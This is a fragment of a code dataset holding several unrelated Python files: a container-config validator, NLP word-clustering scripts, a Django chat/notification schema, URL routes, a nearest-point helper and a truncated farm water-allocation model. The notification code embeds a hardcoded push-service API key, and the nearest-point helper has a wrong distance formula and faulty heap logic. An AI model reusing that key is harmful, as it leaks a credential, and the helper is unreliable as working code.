json.loads(conf_str)\n\n def is_caas_mandatory(self, props):\n if not isinstance(props, dict):\n raise CaasValidationError('The given input: {} is not a dictionary!'.format(props))\n hosts_conf = self._get_conf(props, self.HOSTS_DOMAIN)\n service_profiles = self.caas_utils.get_every_key_occurrence(hosts_conf, self.SERV_PROF)\n pattern = re.compile(self.CAAS_PROFILE_PATTERN)\n for profile in service_profiles:\n if filter(pattern.match, profile):\n return True\n return False\n\n def props_pre_check(self, props):\n self.caas_conf = self._get_conf(props, self.CAAS_DOMAIN)\n self.conf = {self.CAAS_DOMAIN: self.caas_conf}\n if not self.caas_conf:\n raise CaasValidationError('{} is an empty dictionary!'.format(self.conf))\n\n def validate_docker_size_quota(self):\n if not self.caas_utils.is_optional_param_present(self.DOCKER_SIZE_QUOTA, self.caas_conf):\n return\n if not re.match(self.DOCKER_SIZE_QUOTA_PATTERN, self.caas_conf[self.DOCKER_SIZE_QUOTA]):\n raise CaasValidationError(\n '{} is not a valid {}!'.format(self.caas_conf[self.DOCKER_SIZE_QUOTA],\n self.DOCKER_SIZE_QUOTA))\n\n def validate_helm_operation_timeout(self):\n if not self.caas_utils.is_optional_param_present(self.HELM_OP_TIMEOUT, self.caas_conf):\n return\n if not isinstance(self.caas_conf[self.HELM_OP_TIMEOUT], int):\n raise CaasValidationError(\n '{}:{} is not an integer'.format(self.HELM_OP_TIMEOUT,\n self.caas_conf[self.HELM_OP_TIMEOUT]))\n\n def get_netw_obj(self, subnet, parameter):\n try:\n return ipaddr.IPNetwork(subnet)\n except ValueError as exc:\n raise CaasValidationError('{} is an invalid subnet address: {}'.format(\n parameter, exc))\n\n def check_cidr_overlaps_with_netw_subnets(self, cidr_in, props, parameter):\n netw_conf = self._get_conf(props, self.NETW_DOMAIN)\n cidrs = self.caas_utils.get_every_key_occurrence(netw_conf, self.CIDR)\n for cidr in cidrs:\n if cidr_in.overlaps(ipaddr.IPNetwork(cidr)):\n raise CaasValidationError(\n 'CIDR configured for {} shall be an unused IP range, '\n 'but it overlaps with {} from {}.'.format(parameter, cidr,\n self.NETW_DOMAIN))\n def check_oam_cidr_prefix(self, cidr_obj):\n if ipaddr.IPNetwork(cidr_obj).prefixlen != 16:\n raise CaasValidationError('Wrong subnet size in caas.oam_cidr parameter. 
'\n 'The currently supported subnet size is 16')\n\n def validate_docker0_cidr(self, props):\n if not self.caas_utils.is_optional_param_present(self.DOCKER0_CIDR, self.caas_conf):\n return\n docker0_cidr_obj = self.get_netw_obj(self.caas_conf[self.DOCKER0_CIDR], self.DOCKER0_CIDR)\n self.check_cidr_overlaps_with_netw_subnets(docker0_cidr_obj, props, self.DOCKER0_CIDR)\n\n def validate_oam_cidr(self, props):\n if not self.caas_utils.is_optional_param_present(self.OAM_CIDR, self.caas_conf):\n return\n oam_cidr_obj = self.get_netw_obj(self.caas_conf[self.OAM_CIDR], self.OAM_CIDR)\n self.check_cidr_overlaps_with_netw_subnets(oam_cidr_obj, props, self.OAM_CIDR)\n self.check_oam_cidr_prefix(oam_cidr_obj)\n\n def validate_instantiation_timeout(self):\n if not self.caas_utils.is_optional_param_present(self.INSTANTIATION_TIMEOUT,\n self.caas_conf):\n return\n if not isinstance(self.caas_conf[self.INSTANTIATION_TIMEOUT], int):\n raise CaasValidationError('{}:{} is not an integer'.format(\n self.INSTANTIATION_TIMEOUT, self.caas_conf[self.INSTANTIATION_TIMEOUT]))\n\n def validate_encrypted_ca(self, enc_ca):\n self.caas_utils.check_key_in_dict(enc_ca, self.caas_conf)\n enc_ca_str = self.caas_conf[enc_ca][0]\n if not enc_ca_str:\n raise CaasValidationError('{} shall not be empty !'.format(enc_ca))\n try:\n base64.b64decode(enc_ca_str)\n except TypeError as exc:\n raise CaasValidationError('Invalid {}: {}'.format(enc_ca, exc))\n\n def validate_log_forwarding(self):\n # pylint: disable=too-many-branches\n if self.caas_utils.is_optional_param_present(self.BLOG_FORWARDING, self.caas_conf):\n if self.caas_conf[self.BLOG_FORWARDING] not in self.INFRA_LOG_FLUENTD_PLUGINS:\n raise CaasValidationError('\"{}\" property not valid! '\n 'Choose from {}!'.format(self.BLOG_FORWARDING,\n self.INFRA_LOG_FLUENTD_PLUGINS))\n if self.caas_utils.is_optional_param_present(self.LOG_FORWARDING, self.caas_conf):\n log_fw_list = self.caas_conf[self.LOG_FORWARDING]\n if log_fw_list:\n url_d = dict()\n url_s = set()\n for list_item in log_fw_list:\n self.caas_utils.check_key_in_dict('namespace', list_item)\n if list_item['namespace'] == 'kube-system':\n raise CaasValidationError(\n 'You can\\'t set \"kube-system\" as namespace in \"{}\"!'.format(\n self.LOG_FORWARDING))\n self.caas_utils.check_key_in_dict('target_url', list_item)\n if not list_item['target_url'] or not re.match(self.URL_PORT_PATTERN,\n list_item['target_url']):\n raise CaasValidationError(\n '\"target_url\" property {} not valid!'.format(list_item['target_url']))\n if not url_d:\n url_d[list_item['namespace']] = list_item['target_url']\n if list_item['namespace'] in url_d:\n if list_item['target_url'] in url_s:\n raise CaasValidationError('There can\\'t be multiple rules for the same '\n 'target_url for the same {} '\n 'namespace!'.format(list_item['namespace']))\n else:\n url_s.add(list_item['target_url'])\n url_d[list_item['namespace']] = url_s\n else:\n url_d[list_item['namespace']] = list_item['target_url']\n if self.caas_utils.is_optional_param_present('plugin', list_item) and list_item[\n 'plugin'] not in self.FLUENTD_PLUGINS:\n raise CaasValidationError(\n '\"plugin\" property not valid! Choose from {}'.format(\n self.FLUENTD_PLUGINS))\n if self.caas_utils.is_optional_param_present('stream', list_item) and list_item[\n 'stream'] not in self.LOG_FW_STREAM:\n raise CaasValidationError(\n '\"stream\" property not valid! 
Choose from {}'.format(\n self.LOG_FW_STREAM))\n\n def validate_networks(self, props):\n caas_nets = []\n for nets_key in [self.CLUSTER_NETS, self.TENANT_NETS]:\n if self.caas_utils.is_optional_param_present(nets_key, self.caas_conf):\n if not isinstance(self.caas_conf[nets_key], list):\n raise CaasValidationError('{} is not a list'.format(nets_key))\n if len(set(self.caas_conf[nets_key])) != len(self.caas_conf[nets_key]):\n raise CaasValidationError('{} has duplicate entries'.format(nets_key))\n caas_nets.extend(self.caas_conf[nets_key])\n if len(set(caas_nets)) != len(caas_nets):\n raise CaasValidationError('{} and {} must be distinct, but same entries are '\n 'found from both lists'.format(self.CLUSTER_NETS,\n self.TENANT_NETS))\n self._validate_homogenous_net_setup(props, caas_nets)\n\n def _validate_homogenous_net_setup(self, props, caas_nets):\n # Validate homogenous CaaS provider network setup\n # pylint: disable=too-many-locals,too-many-nested-blocks\n hosts_conf = self._get_conf(props, self.HOSTS_DOMAIN)\n netprof_conf = self._get_conf(props, self.NETPROF_DOMAIN)\n net_iface_map = {}\n for net in caas_nets:\n net_iface_map[net] = None\n for host, host_conf in hosts_conf.iteritems():\n # Validate only nodes that can host containerized workloads\n if ('caas_worker' in host_conf[self.SERV_PROF] or\n ('caas_master' in host_conf[self.SERV_PROF] and\n 'compute' not in host_conf[self.SERV_PROF])):\n # Validating CaaS network 'net' mapping in 'host'\n profiles = host_conf.get('network_profiles')\n if isinstance(profiles, list) and profiles:\n net_prof = netprof_conf.get(profiles[0])\n if net_prof is not None:\n ifaces = net_prof.get('provider_network_interfaces', {})\n caas_provider_interfaces = self._filter_provider_networks_by_type(\n self._filter_provider_networkinterfaces_by_net(ifaces, net), 'caas')\n sriov_networks = net_prof.get('sriov_provider_networks', {})\n caas_sriov_networks_present = bool(\n net in sriov_networks and\n sriov_networks[net].get('type', \"\") == 'caas')\n if not caas_provider_interfaces and not caas_sriov_networks_present:\n raise CaasValidationError('CaaS network {} missing from host {}'\n .format(net, host))\n if caas_provider_interfaces:\n self._validate_homogenous_provider_net_setup(\n net_iface_map, net, ifaces)\n if caas_sriov_networks_present:\n self._validate_homogenous_sriov_provider_net_setup(\n net_iface_map, net, sriov_networks)\n\n @staticmethod\n def _filter_provider_networks_by_type(profile, net_type):\n return {name: network for name, network in profile.iteritems()\n if network.get('type', \"\") == net_type}\n\n @staticmethod\n def _filter_provider_networkinterfaces_by_net(provider_interfaces, provider_net):\n return {iface: data for iface, data in provider_interfaces.iteritems()\n if provider_net in data.get('provider_networks', [])}\n\n @staticmethod\n def _validate_homogenous_provider_net_setup(net_iface_map, net, ifaces):\n is_caas_network_present = False\n for iface, data in ifaces.iteritems():\n net_type = data.get('type')\n networks = data.get('provider_networks', [])\n if net in networks and net_type == 'caas':\n is_caas_network_present = True\n if net_iface_map[net] is None:\n net_iface_map[net] = iface\n elif net_iface_map[net] != iface:\n msg = 'CaaS network {} mapped to interface {} in one host '\n msg += 'and interface {} in another host'\n raise CaasValidationError(msg.format(net, iface,\n net_iface_map[net]))\n break\n return is_caas_network_present\n\n @staticmethod\n def 
_validate_homogenous_sriov_provider_net_setup(net_iface_map, net, sriov_networks):\n is_caas_network_present = False\n sriov_provider_net = sriov_networks.get(net, {})\n if sriov_provider_net and sriov_provider_net.get('type') == 'caas':\n interfaces = sriov_provider_net.get('interfaces', [])\n tenant_interfaces = net_iface_map.get(net)\n already_used_ifaces = [set(x).intersection(interfaces)\n for x in net_iface_map.itervalues()\n if x and isinstance(x, list)]\n if tenant_interfaces is None and interfaces:\n net_iface_map[net] = interfaces\n is_caas_network_present = True\n elif already_used_ifaces:\n msg = 'CaaS network {} mapped to sriov interfaces {} in one host '\n msg += 'and sriov interfaces {} in another host'\n raise CaasValidationError(msg.format(net, interfaces,\n tenant_interfaces))\n return is_caas_network_present\n\n def validate_dns_domain(self):\n domain = self.caas_conf[self.DOMAIN_NAME]\n if not self.caas_utils.is_optional_param_present(self.DOMAIN_NAME, self.caas_conf):\n return\n if not re.match(self.DOMAIN_NAME_PATTERN, domain):\n raise CaasValidationError('{} is not a valid {} !'.format(\n domain,\n self.DOMAIN_NAME))\n","sub_path":"validators/src/CaasValidation.py","file_name":"CaasValidation.py","file_ext":"py","file_size_in_byte":18516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"581462694","text":"#!/usr/bin/env python3\n\n\"\"\"\nAuthor : Yukun Feng\nDate : 2018/06/20\nEmail : yukunfg@gmail.com\nDescription : Minimal text processing framework\n\"\"\"\n\nimport sys\nimport argparse\nimport re\nimport string\nimport collections\nimport os\nfrom collections import Counter\nimport numpy as np\nimport torchtext\n\n\ndef context_word_clustering(args):\n text_path = args.file_path\n freq_thre = args.freq_thre\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(text_path, 'r').readlines()\n ]\n vocab = torchtext.vocab.Vocab(counter, specials=[])\n vocab_len = len(vocab.itos)\n token2context_words = np.zeros(\n (vocab_len, vocab_len),\n dtype=int\n )\n\n context_window = 1\n with open(text_path, 'r') as fh:\n for line in fh:\n line = line.strip()\n # Skip empty lines\n if line == \"\":\n continue\n # line = f\" {line} \"\n tokens = line.split()\n for count, token in enumerate(tokens, 0):\n # if token in [\"\", \"\"]:\n # continue\n if counter[token] > freq_thre:\n continue\n for context_window_i in range(-context_window, context_window + 1):\n if context_window_i == 0:\n continue\n if count + context_window_i < 0 or count + context_window_i > len(tokens) - 1:\n continue\n context_word = tokens[count + context_window_i]\n token_id = vocab.stoi[token]\n context_id = vocab.stoi[context_word]\n token2context_words[token_id][context_id] += 1\n\n # if token not in token2context_words:\n # token2context_words[token] = [0] * len(vocab.itos)\n # token2context_words[token][vocab.stoi[token]] += 1\n\n # for count, row in enumerate(token2context_words, 0):\n print(\"before matmul\")\n similarities = np.matmul(token2context_words, token2context_words.transpose())\n print(\"end matmul\")\n for token, freq in counter.most_common():\n token_index = vocab.stoi[token]\n similarity = similarities[token_index]\n print(f\"processing {token_index}\")\n # print(f\"{token}-{token_index}: {vec}\")\n # similarities = []\n # for row_index, row in enumerate(token2context_words, 0):\n # if row_index == token_index:\n # similarities.append(-1)\n # continue\n # similarity = np.dot(vec, row)\n # 
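# Aside on the CaasValidation record above (illustrative, not part of the
# original file): its check_cidr_overlaps_with_netw_subnets relies on the
# legacy Python 2 'ipaddr' package. A minimal Python 3 sketch of the same
# overlap test with the standard-library 'ipaddress' module; the helper name
# and the sample CIDRs below are invented.
import ipaddress

def cidr_overlaps_any(candidate, existing_cidrs):
    # Return the first configured CIDR that overlaps the candidate, else None.
    cand = ipaddress.ip_network(candidate, strict=False)
    for cidr in existing_cidrs:
        if cand.overlaps(ipaddress.ip_network(cidr, strict=False)):
            return cidr
    return None

print(cidr_overlaps_any('172.17.0.0/16', ['10.0.0.0/8', '172.17.128.0/17']))  # 172.17.128.0/17
print(cidr_overlaps_any('192.168.1.0/24', ['10.0.0.0/8']))  # None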
similarities.append(similarity)\n most_similar_indexs = sorted(\n range(len(similarity)),\n key=lambda k: similarity[k],\n reverse=True\n )\n print(f\"{token}: {[vocab.itos[j] for j in most_similar_indexs[0:10]]}\")\n \n # for k, v in token2context_words.items():\n # print(k, v)\n # set_v = set(v)\n # print(f\"{k}-{counter[k]} {len(v)} {len(set_v)}\") \n # print(set_v)\n # print(\"\")\n\n\ndef full_clustering(args):\n text_path = args.file_path\n freq_thre = args.freq_thre\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(text_path, 'r').readlines()\n ]\n\n context2token = {}\n token2cluster = {}\n cluster_counter = 1\n fh = open(text_path, \"r\")\n for line_count, line in enumerate(fh, 1):\n line = line.strip()\n # Skip empty lines\n if line == \"\":\n continue\n line = f\" {line} \"\n tokens = line.split()\n for count, token in enumerate(tokens, 0):\n if count - 1 < 0 or count + 1 > len(tokens) - 1:\n continue\n if counter[token] > freq_thre:\n continue\n\n # making context\n prev_token = tokens[count - 1]\n next_token = tokens[count + 1]\n context = f\"{prev_token}_{next_token}\"\n\n if token not in token2cluster:\n if context not in context2token:\n token2cluster[token] = cluster_counter\n cluster_counter += 1\n context2token[context] = token\n else:\n token_given_c = context2token[context]\n token2cluster[token] = token2cluster[token_given_c]\n else:\n if context not in context2token:\n context2token[context] = token\n else:\n token_given_c = context2token[context]\n # updating the corresponding token clusters\n old_cluster = token2cluster[token]\n new_cluster = token2cluster[token_given_c]\n for corresponding_token, corresponding_cluster in token2cluster.items():\n if corresponding_cluster == old_cluster:\n token2cluster[corresponding_token] = new_cluster\n\n print_map(counter, token2cluster)\n\n\ndef loose_clustering(args):\n text_path = args.file_path\n freq_thre = args.freq_thre\n\n # get frequency of corpus\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(text_path, 'r').readlines()\n ]\n\n fh = open(text_path, \"r\")\n context2tokens = {}\n for line in fh:\n line = line.strip()\n # Skip empty lines\n if line == \"\":\n continue\n\n tokens = line.split()\n for count, token in enumerate(tokens, 0):\n if count - 1 < 0 or count + 1 > len(tokens) - 1:\n continue\n if counter[token] > freq_thre:\n # if counter[token] < freq_thre:\n continue\n\n # making context\n prev_token = tokens[count - 1]\n next_token = tokens[count + 1]\n context = f\"{prev_token}_{next_token}\"\n if context not in context2tokens:\n context2tokens[context] = []\n # if token not in context2tokens[context]:\n context2tokens[context].append(token)\n fh.close()\n \n sorted_dict = collections.OrderedDict(\n sorted(context2tokens.items(), reverse=False, key=lambda t: len(t[1]))\n )\n token2cluster = {}\n cluster_counter = 1\n limit_thre_count = 1\n for k, v in sorted_dict.items():\n set_v = set(v)\n # print(f\"{k} {len(set_v)} {len(v)} {set_v}\") \n for token in set_v:\n if limit_thre_count >= len(sorted_dict.keys()) - 600:\n token2cluster[token] = cluster_counter\n else:\n token2cluster[token] = 0\n limit_thre_count += 1\n cluster_counter += 1\n\n\n print_map(counter, token2cluster, False)\n\n\ndef print_map(counter, token2cluster, verbose=False):\n cluster2tokens = {}\n for token in counter.keys():\n if token in token2cluster:\n cluster = token2cluster[token]\n print(f\"{token} <{cluster}>\")\n else:\n cluster = token\n 
print(f\"{token} {cluster}\")\n if cluster not in cluster2tokens:\n cluster2tokens[cluster] = []\n cluster2tokens[cluster].append(token)\n\n if verbose:\n print(\"\\ncluster2tokens\\n\")\n sorted_dict = collections.OrderedDict(\n sorted(cluster2tokens.items(), reverse=False, key=lambda t: len(t[1]))\n )\n for k, v in sorted_dict.items():\n print(f\"{k} {len(v)} {' '.join(v)}\")\n\n\ndef random_clustering(args):\n text_path = args.file_path\n freq_thre = args.freq_thre\n cluster_num = args.cluster_num\n\n # get frequency of corpus\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(text_path, 'r').readlines()\n ]\n\n token2cluster = {}\n\n for token in counter.keys():\n if counter[token] > freq_thre:\n continue\n cluster = np.random.randint(0, cluster_num)\n token2cluster[token] = cluster\n\n print_map(counter, token2cluster, verbose=False)\n\n\ndef from_toolkit_clusters(args):\n freq_thre = args.freq_thre\n file_path = os.path.expanduser(args.file_path)\n # cluster_path = os.path.expanduser(\"./train.txt.full.skipgram.cluster\")\n cluster_path = os.path.expanduser(\"./clustercat/cluster.tsv\")\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(file_path, 'r').readlines()\n ]\n\n token2cluster = {}\n\n with open(cluster_path, 'r') as fh:\n for line in fh:\n line = line.strip()\n # Skip empty lines\n if line == \"\":\n continue\n items = line.split()\n token = items[0]\n if counter[token] <= freq_thre:\n token2cluster[token] = items[1]\n\n print_map(counter, token2cluster, verbose=False)\n\n\nif __name__ == \"__main__\":\n np.random.seed(0)\n parser = argparse.ArgumentParser(\n description='clustering words by context pairs',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-file_path', help='file path', required=True\n )\n parser.add_argument(\n '-freq_thre', help='freq_thre',\n required=False, default=45, type=int\n )\n parser.add_argument(\n '-cluster_num', help='cluster_num',\n required=False, default=600, type=int\n )\n args = parser.parse_args()\n # full_clustering(args)\n # loose_clustering(args)\n # random_clustering(args)\n from_toolkit_clusters(args)\n # context_word_clustering(args)\n","sub_path":"data/wikitext-2/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":9677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"347977845","text":"from .models import Chat\nfrom Farm.models import Farm\nfrom Buyer.models import Buyer\nfrom Sales.models import Sale\nimport graphene\nfrom graphene_django import DjangoObjectType\nfrom pyfcm import FCMNotification\n\n\nclass ChatType(DjangoObjectType):\n class Meta:\n model = Chat\n\n\nclass Query(graphene.ObjectType):\n chats = graphene.List(ChatType)\n\n def resolve_chats(self, info):\n return Chat.objects.all()\n\n\nclass AddChat(graphene.Mutation):\n chat = graphene.Field(ChatType)\n\n class Arguments:\n BuyerId = graphene.Int(required=True)\n SellerId = graphene.Int(required=True)\n SaleId = graphene.Int(required=True)\n DocId = graphene.String(required=True)\n\n def mutate(self, info, BuyerId, SellerId, DocId, SaleId=None):\n buyer = Buyer.objects.get(id=BuyerId)\n seller = Farm.objects.get(id=SellerId)\n chat = Chat(partyA=buyer, partyB=seller, docId=DocId)\n if SaleId:\n sale = Sale.objects.get(id=SaleId)\n chat.sale = sale\n chat.save()\n\n return AddChat(chat=chat)\n\n\nclass SendNotification(graphene.Mutation):\n chat = 
graphene.Field(ChatType)\n\n class Arguments:\n partyId = graphene.Int(required=True)\n type = graphene.String(required=True)\n Message = graphene.String(required=True)\n title = graphene.String(required=True)\n action = graphene.String(required=True)\n\n def mutate(self, info, partyId, type, Message, title, action):\n push = FCMNotification(\n api_key=\"AAAAr7bm4Pw:APA91bGzMCMzPkoSPvqXkbSFGe5cRBjMDWRKV8tIkVGg76UwcYARrmMWrQjkx9fDsG\"\n \"GcrrfcDbkLuhvmmeDtzPsdW22MnNzND_14rEMVTLOpGXL67G8tj88sKQrKrs0iIhWxXwqGEbiA\")\n if type == \"buyer\":\n print(\"Buyer Being Sent\")\n print(partyId)\n # print(type(partyId))\n buyer = Buyer.objects.get(id=partyId)\n regid = buyer.owner.fcm_id\n print(regid)\n result = push.notify_single_device(registration_id=regid, message_title=title, message_body=Message)\n print(result)\n else:\n print(\"Seller Being Sent Notification\")\n print(partyId)\n # print(type(partyId))\n farm = Farm.objects.get(id=partyId)\n regid = farm.owner.fcm_id\n print(regid)\n result = push.notify_single_device(registration_id=regid, message_title=title, message_body=Message)\n print(result)\n\n\nclass Mutation(graphene.ObjectType):\n addChat = AddChat.Field()\n notify = SendNotification.Field()\n","sub_path":"app/Chats/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336663524","text":"from django.conf.urls import include, url\nfrom rest_framework import routers\n\nfrom rdmo.core.views import SettingsViewSet\n\nfrom .views import (ConditionsExportView, ConditionsImportXMLView,\n ConditionsView)\nfrom .viewsets import (AttributeViewSet, ConditionApiViewSet, ConditionViewSet,\n OptionViewSet, RelationViewSet)\n\n# regular views\nconditions_patterns = [\n url(r'^$', ConditionsView.as_view(), name='conditions'),\n url(r'^export/(?P[a-z]+)/$', ConditionsExportView.as_view(), name='conditions_export'),\n url(r'^import/(?P[a-z]+)/$', ConditionsImportXMLView.as_view(), name='conditions_import'),\n]\n\n# internal AJAX API\ninternal_router = routers.DefaultRouter()\ninternal_router.register(r'conditions', ConditionViewSet, base_name='condition')\ninternal_router.register(r'attributes', AttributeViewSet, base_name='attribute')\ninternal_router.register(r'options', OptionViewSet, base_name='option')\ninternal_router.register(r'relations', RelationViewSet, base_name='relation')\ninternal_router.register(r'settings', SettingsViewSet, base_name='setting')\n\nconditions_patterns_internal = [\n url(r'^', include(internal_router.urls)),\n]\n\n# programmable API\napi_router = routers.DefaultRouter()\napi_router.register(r'conditions', ConditionApiViewSet, base_name='condition')\n\nconditions_patterns_api = [\n url(r'^', include(api_router.urls)),\n]\n","sub_path":"rdmo/conditions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"293666977","text":"class Solution(object):\n # heap queue O(nlgk)\n def findKthLargest(self, array, origin, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n h = []\n for p in array:\n d = self.getDistance(origin, p)\n if len(h) < k:\n heapq.heappush(h, (d, p))\n else:\n heapq.heappush(h, (d, p))\n h.pop()\n return h[-1]\n\n\n def getDistance(self, p1, p2):\n return ((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1])) ** 
0.5","sub_path":"kth_closest_point.py","file_name":"kth_closest_point.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"108216186","text":"# pmp calibrated costs for both sw and gw\n\nimport os\nimport sys\nglobal basepath\nprint(os.path.dirname(sys.argv[0]))\n##basepath = os.path.dirname(sys.argv[0]).split(__file__)[0]\nfrom pyomo.environ import * # JY temp\nfrom pyomo.opt import SolverFactory\nimport pandas as pd\nimport numpy as np\ntry:\n import cPickle as pickle\nexcept ImportError: # python 3.x\n import pickle\nimport pdb\n\n\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_v1.xlsx\")\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20201005.xlsx\")\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20201028_GW.xlsx\")\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20220223_GW.xlsx\")\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20220311_GW.xlsx\")\ndata_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20220323_GW.xlsx\")\ndata_profit = data_file.parse(\"Profit\")\ndata_profit['area_irrigated'] = data_profit['area_irrigated'] * 1000\ndata_profit['area_irrigated_gw'] = data_profit['area_irrigated_gw'] * 1000\ndata_profit['area_irrigated_sw'] = data_profit['area_irrigated_sw'] * 1000\naggregation_functions = {'area_irrigated_sw': 'sum'}\narea_irrigated_sw_farm = data_profit.groupby(['nldas'], as_index=False).aggregate(aggregation_functions)\naggregation_functions = {'area_irrigated_gw': 'sum'}\narea_irrigated_gw_farm = data_profit.groupby(['nldas'], as_index=False).aggregate(aggregation_functions)\n\n#data_constraint = data_file.parse(\"Constraint\")\n\nnldas_ids=data_profit[\"nldas\"][0:53835].tolist()\n\n## B.1. 
Preparing model indices and constraints:\n#ids = range(592185) # total number of crop and nldas ID combinations\nids = range(538350) # total number of crop and nldas ID combinations\nfarm_ids = range(53835) # total number of farm agents / nldas IDs\nsd_no = len(farm_ids)\ncrop_types=[str(i) for i in list(pd.unique(data_profit[\"crop\"]))]\ncrop_no=len(crop_types)\ncrop_ids_by_farm_and_constraint={}\nland_constraints_by_farm={}\nwater_constraints_by_farm={}\n#crop_ids_by_farm=dict(enumerate([np.where(data_profit[\"nldas\"]==nldas_ids[i])[0].tolist() for i in range(53835)])) #JY this takes forever, find better way\nwith open('data_inputs/pickles/crop_ids_by_farm.p', 'rb') as fp:\n crop_ids_by_farm = pickle.load(fp)\n# with open('data_inputs/max_land_constr_20201102.p', 'rb') as fp:\n# land_constraints_by_farm = pickle.load(fp, encoding='latin1')\nwith open('data_inputs/pickles/max_land_constr_20220307_protocol2.p', 'rb') as fp:\n land_constraints_by_farm = pickle.load(fp, encoding='latin1')\nwith open('data_inputs/pickles/water_constraints_by_farm_v2.p', 'rb') as fp:\n water_constraints_by_farm = pickle.load(fp, encoding='latin1')\nwith open('data_inputs/pickles/crop_ids_by_farm_and_constraint.p', 'rb') as fp:\n crop_ids_by_farm_and_constraint = pickle.load(fp)\n\n#Revise to account for removal of \"Fodder_Herb category\"\ncrop_ids_by_farm_new = {}\nfor i in crop_ids_by_farm:\n crop_ids_by_farm_new[i] = crop_ids_by_farm[i][0:10]\ncrop_ids_by_farm = crop_ids_by_farm_new\ncrop_ids_by_farm_and_constraint = crop_ids_by_farm_new\n\nwater_constraints_by_farm = dict.fromkeys(water_constraints_by_farm, 9999999999)\n\n# JY this outputs pandas series for each entry of land_constraints_by_farm and water_constraints_by_farm; need\n# to convert to float\n# for i in range(53835):\n# #crop_ids_by_farm_and_constraint[i]=np.where((data_profit[\"nldas\"]==nldas_ids[i]))[0].tolist()\n# constraint_ids=np.where((data_constraint[\"nldas\"]==nldas_ids[i]))[0]\n# #land_constraints_by_farm[i]=data_constraint.iloc[constraint_ids][\"land_constraint\"].astype('float')\n# water_constraints_by_farm_2[i]=data_constraint.iloc[constraint_ids][\"water_constraint\"].astype('float')\n\n# Replace NIRs with 0 value to 0.1 (nominal irrigation) to account for inconsistency between observed surface water irrigated area and NIR\n\n## B.2. Preparing linear profit coefficients:\nprices=data_profit[\"price\"]\nyields=data_profit[\"yield\"]\nland_costs=data_profit[\"land_cost\"]\nwater_nirs=data_profit[\"nir_corrected\"]\nsw_costs=data_profit[\"sw_cost\"] #JY need to fill in gaps for DC, figure out how to handle groundwater costs\ngw_costs=data_profit[\"gw_cost\"]\ndata_profit[\"alpha\"] = 0\nalphas_total=data_profit[\"alpha\"]\nalphas_sw=data_profit[\"alpha\"].head(53835) # ids for surface water are farm specific (summed over all crops)\n\n# linear_term_sum=[p*y - c - (swc*n) - (gwc*n) - aland - asw for p,y,c,swc,gwc,n,aland,asw in zip(prices,yields,land_costs,sw_costs,gw_costs,water_nirs,alphas_land,alphas_sw)]\nlinear_term_sum_total = [p*y - c - aland for p,y,c,aland in zip(prices,yields,land_costs,alphas_total)]\nlinear_term_sum_sw = [-(swc*n*1000) for swc,n in zip(sw_costs,water_nirs)] # multiply by 1000 to get to non-corrected NIRs\nlinear_term_sum_gw = [-(gwc*n*1000) for gwc,n in zip(gw_costs,water_nirs)]\n# linear_term_sum_gw = [p*y - c - (gwc*n) - aland for p,y,c,gwc,n,aland in zip(prices,yields,land_costs,gw_costs,water_nirs,alphas_total)]\n\n## B.3. 
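# Toy restatement of the linear profit-term construction above (all numbers
# invented, names shortened): the total term is price*yield minus land cost
# minus the calibration intercept alpha, while water costs enter as separate
# negative terms scaled by 1000 back to uncorrected NIRs.
prices = [4.0, 3.5]
crop_yields = [120.0, 90.0]
land_costs = [150.0, 110.0]
alphas = [0.0, 0.0]
sw_costs = [20.0, 25.0]
nirs = [1.2, 0.8]

linear_total = [p * y - c - a for p, y, c, a in zip(prices, crop_yields, land_costs, alphas)]
linear_sw = [-(swc * n * 1000) for swc, n in zip(sw_costs, nirs)]
print(linear_total)  # [330.0, 205.0]
print(linear_sw)     # [-24000.0, -20000.0]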
Preparing model vars and params: (these need to be dict()!)\ngammas_total=dict(data_profit[\"gamma\"]) #JY temporarily set at 100\ngammas_sw=dict(data_profit[\"gamma\"].head(53835)) #JY temporarily set at 100\nnet_prices_total=dict(enumerate(linear_term_sum_total))\nnet_prices_sw=dict(enumerate(linear_term_sum_sw))\nnet_prices_gw=dict(enumerate(linear_term_sum_gw))\nx_start_values=dict(enumerate([0.0]*3))\nnirs=dict(water_nirs)\n\n\n## C.1. Constructing model inputs:\nfwm = ConcreteModel()\nfwm.ids = Set(initialize=ids)\n# fwm.ids = Set(initialize=crop_ids_by_farm)\nfwm.farm_ids = Set(initialize=farm_ids)\nfwm.crop_ids_by_farm = Set(fwm.farm_ids, initialize=crop_ids_by_farm)\nfwm.crop_ids_by_farm_and_constraint = Set(fwm.farm_ids, initialize=crop_ids_by_farm_and_constraint)\nfwm.net_prices_total = Param(fwm.ids, initialize=net_prices_total, mutable=True)\nfwm.net_prices_sw = Param(fwm.ids, initialize=net_prices_sw, mutable=True)\nfwm.net_prices_gw = Param(fwm.ids, initialize=net_prices_gw, mutable=True)\nfwm.gammas_total = Param(fwm.ids, initialize=gammas_total, mutable=True)\nfwm.alphas_sw = Param(fwm.farm_ids, initialize=alphas_sw, mutable=True)\nfwm.gammas_sw = 